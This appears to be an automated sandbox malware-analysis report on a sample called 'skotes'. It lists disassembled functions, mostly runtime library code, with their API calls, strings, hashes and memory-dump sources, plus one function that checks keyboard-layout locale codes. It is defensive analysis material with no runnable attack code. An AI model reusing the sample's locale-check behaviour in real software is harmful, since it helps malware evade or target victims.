API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 7095254045faed2553d93f0c9490efac9b80fc04d73eb81a88eda45e0edda8b1
Instruction ID: b27cf2173bd35c32a824bf4ef6feeb97883ccbcf9f0634586d8c00e0a98c48d7
Opcode Fuzzy Hash: 7095254045faed2553d93f0c9490efac9b80fc04d73eb81a88eda45e0edda8b1
Instruction Fuzzy Hash: A5612A75952710EBD7016FB4BC4DF893AB8EA09B93B608537F905D21B2E6F88104CB6D

Function 0041F028 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 229
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041F2BB

Strings

pEvents, xrefs: 0041F2B3

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pEvents
API String ID: 2141394445-2498624650
Opcode ID: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
Instruction ID: 66998cc49b15140c198e060e127dcf308e046c772bddf22695f73d3154dbb627
Opcode Fuzzy Hash: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
Instruction Fuzzy Hash: 0D819F35D00218DBCF14DFA5C981BEEB7B1AF54314F14406AE801A7282D77DAD8ACB59

Function 020DF5C6 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 020DF60A

Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF1C0
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF1D2
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF1E4
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF1F6
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF208
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF21A
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF22C
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF23E
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF250
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF262
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF274
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF286
Part of subcall function 020DF1A3: _free.LIBCMT ref: 020DF298

_free.LIBCMT ref: 020DF5FF

Part of subcall function 020DB05C: HeapFree.KERNEL32(00000000,00000000,?,020DF334,?,00000000,?,?,?,020DF35B,?,00000007,?,?,020DF75D,?), ref: 020DB072
Part of subcall function 020DB05C: GetLastError.KERNEL32(?,?,020DF334,?,00000000,?,?,?,020DF35B,?,00000007,?,?,020DF75D,?,?), ref: 020DB084

_free.LIBCMT ref: 020DF621
_free.LIBCMT ref: 020DF636
_free.LIBCMT ref: 020DF641
_free.LIBCMT ref: 020DF663
_free.LIBCMT ref: 020DF676
_free.LIBCMT ref: 020DF684
_free.LIBCMT ref: 020DF68F
_free.LIBCMT ref: 020DF6C7
_free.LIBCMT ref: 020DF6CE
_free.LIBCMT ref: 020DF6EB
_free.LIBCMT ref: 020DF703

Strings

`'F, xrefs: 020DF5DC
8"F, xrefs: 020DF6B2

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: 8"F$`'F
API String ID: 161543041-3117062166
Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction ID: 5b7b5e9b9e3823a4767d3c4be8f954f038d7b821ff938e0802490b6cf6bc6b5c
Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction Fuzzy Hash: 7E316035602302EFDB726A38D848B9677E9BF00358F558419E06AD6DA0DF71A880EF10

Function 0043F35F Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0043F3A3

Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF59
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF6B
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF7D
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF8F
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFA1
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFB3
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFC5
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFD7
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFE9
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFFB
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043F00D
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043F01F
Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043F031

_free.LIBCMT ref: 0043F398

Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D

_free.LIBCMT ref: 0043F3BA
_free.LIBCMT ref: 0043F3CF
_free.LIBCMT ref: 0043F3DA
_free.LIBCMT ref: 0043F3FC
_free.LIBCMT ref: 0043F40F
_free.LIBCMT ref: 0043F41D
_free.LIBCMT ref: 0043F428
_free.LIBCMT ref: 0043F460
_free.LIBCMT ref: 0043F467
_free.LIBCMT ref: 0043F484
_free.LIBCMT ref: 0043F49C

Strings

`'F, xrefs: 0043F375
8"F, xrefs: 0043F44B

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: 8"F$`'F
API String ID: 161543041-3117062166
Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction ID: 543839021cf0bf63342fab8d7291383f9c2b30be018e8c543b9015e977d3828c
Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction Fuzzy Hash: 0C31A232A00201DFEB206A3AD845B5B73E6EF18315F10642FE485D7691DF78EC94CB19

Function 020BF28F Relevance: 24.2, APIs: 16, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 020BF296
std::invalid_argument::invalid_argument.LIBCONCRT ref: 020BF522

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: H_prolog3std::invalid_argument::invalid_argument
String ID:
API String ID: 1590901807-0
Opcode ID: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
Instruction ID: a1cef404ebaf5f08b93dacde198fd511e4212932db3062e756c4cf489766d234
Opcode Fuzzy Hash: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
Instruction Fuzzy Hash: CC815731D0031A9BCF37DFA8CD88BEEB7B5BF44714F244119E805A7A81DB34AA45EA51

Function 00405C10 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 426COMMON

Download Yara Rule

Strings

00000423, xrefs: 004060FA
0000043f, xrefs: 0040612B
00000419, xrefs: 00406098
00000422, xrefs: 004060C9
Keyboard Layout\Preload, xrefs: 00406054

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 7b30f4bb64713f8e8560b0a060365d672a22d772f42773569fe59456b17a37f7
Instruction ID: 448877648adff1088d2a9d486534a169f5918e2e35df4f0b5b8ee8aeb0257759
Opcode Fuzzy Hash: 7b30f4bb64713f8e8560b0a060365d672a22d772f42773569fe59456b17a37f7
Instruction Fuzzy Hash: 5DF1C170900248ABEB24DF54CD85BDEBBB9EB45304F5041AAF509A72C1DB789A84CF99

Function 0041D029 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00465750,00000FA0,?,?,0041D007), ref: 0041D035
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0041D007), ref: 0041D040
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041D007), ref: 0041D051
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041D063
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041D071
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0041D007), ref: 0041D094
___scrt_fastfail.LIBCMT ref: 0041D0A5
RtlDeleteCriticalSection.NTDLL(00465750), ref: 0041D0B0
CloseHandle.KERNEL32(00000000,?,?,0041D007), ref: 0041D0C0

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 0041D03B
SleepConditionVariableCS, xrefs: 0041D05D
kernel32.dll, xrefs: 0041D04C
WakeAllConditionVariable, xrefs: 0041D069

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 3578986977-3242537097
Opcode ID: 5773b3b592dab99726245edcd6fa20dcc163fa756fd668b0a9920edcf870acc0
Instruction ID: da8957fb05adf3e2478d3987b837cced664d2ae1275a3d1fb98c7f3dc6632c06
Opcode Fuzzy Hash: 5773b3b592dab99726245edcd6fa20dcc163fa756fd668b0a9920edcf870acc0
Instruction Fuzzy Hash: 1501B575E40B11ABDB211B75AC08F9B3A98DB45B57F140132FC05D22A1EAB9CC41CA6E

Function 020D2938 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 020D294A

Part of subcall function 020D2748: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 020D276B

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 020D296B
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 020D2978
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 020D29C6
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 020D2A4D
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 020D2A60
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 020D2AAD

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
Instruction ID: af319f23cf8e1aabdd84defa67302c902126496bdc60fc48beb1046c1c72db6b
Opcode Fuzzy Hash: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
Instruction Fuzzy Hash: 5E817D34902349AFDF16DFA4C950BFEBBB2AF45318F044098EC516B252C7728966FB61

Function 004326D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 004326E3

Part of subcall function 004324E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00432504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432704
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00432711
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043275F
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 004327E6
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 004327F9
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00432846

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
Instruction ID: fb03d83531a47042b93fe6564ff1c061b34d3f88821af197b1cf19dfef14ec32
Opcode Fuzzy Hash: c59a2110c268144207470cacd74e4257a298ce88abd0f6ffd6155045285da657
Instruction Fuzzy Hash: 6B81C270900249ABDF169F54CA41BBF7BB1AF0D308F04509AEC4127352C7BA8D16DB65

Function 020C4745 Relevance: 22.7, APIs: 15, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 020C474C
ListArray.LIBCONCRT ref: 020C479F

Part of subcall function 020C4580: RtlInitializeSListHead.NTDLL(?), ref: 020C464C
Part of subcall function 020C4580: RtlInitializeSListHead.NTDLL(?), ref: 020C4656

ListArray.LIBCONCRT ref: 020C47D3
Hash.LIBCMT ref: 020C483C
Hash.LIBCMT ref: 020C484C
RtlInitializeSListHead.NTDLL(?), ref: 020C48E1
RtlInitializeSListHead.NTDLL(?), ref: 020C48EE
RtlInitializeSListHead.NTDLL(?), ref: 020C48FB
RtlInitializeSListHead.NTDLL(?), ref: 020C4908

Part of subcall function 020C9EA8: std::bad_exception::bad_exception.LIBCMT ref: 020C9ECA

RegisterWaitForSingleObject.KERNEL32(?,00000000,00427A15,?,000000FF,00000000), ref: 020C4990
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 020C49B2
GetLastError.KERNEL32(020C56F2,?,?,00000000,?,?), ref: 020C49C4
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 020C49E1

Part of subcall function 020BFE11: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,020C56F2,00000008,?,020C49E6,?,00000000,00427A06,?,7FFFFFFF,7FFFFFFF,00000000), ref: 020BFE29

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 020C4A0B

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 1224710184-0
Opcode ID: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
Instruction ID: 7bbd6a69914c9210aefcda5c5723639815fbe4bf7b57df2bc2725ca891441a26
Opcode Fuzzy Hash: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
Instruction Fuzzy Hash: 33816CF0A11B26ABD759DF74C854BD9FBA9BF08700F10421EE52897280CBB4A264DFD1

Function 004244DE Relevance: 21.2, APIs: 14, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00424538

Part of subcall function 00424319: RtlInitializeSListHead.NTDLL(?), ref: 004243E5
Part of subcall function 00424319: RtlInitializeSListHead.NTDLL(?), ref: 004243EF

ListArray.LIBCONCRT ref: 0042456C
Hash.LIBCMT ref: 004245D5
Hash.LIBCMT ref: 004245E5
RtlInitializeSListHead.NTDLL(?), ref: 0042467A
RtlInitializeSListHead.NTDLL(?), ref: 00424687
RtlInitializeSListHead.NTDLL(?), ref: 00424694
RtlInitializeSListHead.NTDLL(?), ref: 004246A1

Part of subcall function 00429C41: std::bad_exception::bad_exception.LIBCMT ref: 00429C63

RegisterWaitForSingleObject.KERNEL32(?,00000000,00427A15,?,000000FF,00000000), ref: 00424729
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0042474B
GetLastError.KERNEL32(0042548B,?,?,00000000,?,?), ref: 0042475D
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0042477A

Part of subcall function 0041FBAA: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,0042548B,00000008,?,0042477F,?,00000000,00427A06,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0041FBC2

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004247A4

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
Instruction ID: 8edcf0d5cb27459604d76cf7b2957bb715be8d06604c13dd231c773c6d0fd610
Opcode Fuzzy Hash: cff4f1584c67b4dd39a057eedf59500e630592c2a8e2e850217cf0530dd3835e
Instruction Fuzzy Hash: 37816EB0B10B22AAD708DF75D845BD9FBA8BF49704F50021FF42897281CBB8A564CBD5

Function 020C2A99 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 020C2AA8

Part of subcall function 020C3D93: GetVersionExW.KERNEL32(?), ref: 020C3DB7
Part of subcall function 020C3D93: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 020C3E56

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 020C2ABC
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 020C2ADD
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 020C2B46
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 020C2B7A

Part of subcall function 020C0A54: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 020C0A74

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 020C2BFA

Part of subcall function 020C25C3: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 020C25D7

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 020C2C42

Part of subcall function 020C0A29: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 020C0A45

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 020C2C56
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 020C2C67
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 020C2CB4
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 020C2CD9
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 020C2CE5

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
Instruction ID: 3f60ee03691cb4c8ea85ef39c80ecfdf66a5ba7b04bb2ca51fdb266a33d23ede
Opcode Fuzzy Hash: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
Instruction Fuzzy Hash: 9F81A1B1A00716DFCB59DFA8D8D06BDB7F2BB48704B34407DD845A7A80E770A940EB99

Function 00422832 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00422841

Part of subcall function 00423B2C: GetVersionExW.KERNEL32(?), ref: 00423B50
Part of subcall function 00423B2C: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00423BEF

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422855
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422876
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004228DF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00422913

Part of subcall function 004207ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0042080D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422993

Part of subcall function 0042235C: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00422370

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229DB

Part of subcall function 004207C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004207DE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00422A00
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00422A4D
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422A72
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422A7E

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
Instruction ID: e80cf76bb90d4b83ff5cf9a0939ff877604985d568bc9a9fcea241cccaa3ebda
Opcode Fuzzy Hash: 9abd196dbe3760ed533f204942a39c663444424dc11bb6fb8cf1de85ffcec6e8
Instruction Fuzzy Hash: 0481BF71B00526ABCB18DF69FA9057EB7F1BB48704B94403ED441A3741EBB8A981CB9D

Function 0041FA71 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00423BE6), ref: 0041FA7F
GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 0041FA8D
GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 0041FA9B
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumberEx), ref: 0041FAC9
GetLastError.KERNEL32(?,?,?,00423BE6), ref: 0041FAE4
GetLastError.KERNEL32(?,?,?,00423BE6), ref: 0041FAF0
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FB06

Strings

GetThreadGroupAffinity, xrefs: 0041FA93
kernel32.dll, xrefs: 0041FA7A
GetCurrentProcessorNumberEx, xrefs: 0041FABE
SetThreadGroupAffinity, xrefs: 0041FA87

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 1654681794-465693683
Opcode ID: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
Instruction ID: d2013d26350a1230dd44c523f95b164804869e8c7fe68790ab887d0678fdf32d
Opcode Fuzzy Hash: 7fe6c5ece6de4c50eb3fb3b842b885c674e1d20cdf18a0be90147e923e9c19f3
Instruction Fuzzy Hash: 800165396003116F97107BB5BC4ABAB7AACAD04756724053BF805D2293EAACD449866D

Function 020D550C Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 020D5607
type_info::operator==.LIBVCRUNTIME ref: 020D562E
___TypeMatch.LIBVCRUNTIME ref: 020D573A
CatchIt.LIBVCRUNTIME ref: 020D578F
IsInExceptionSpec.LIBVCRUNTIME ref: 020D5815
_UnwindNestedFrames.LIBCMT ref: 020D589C
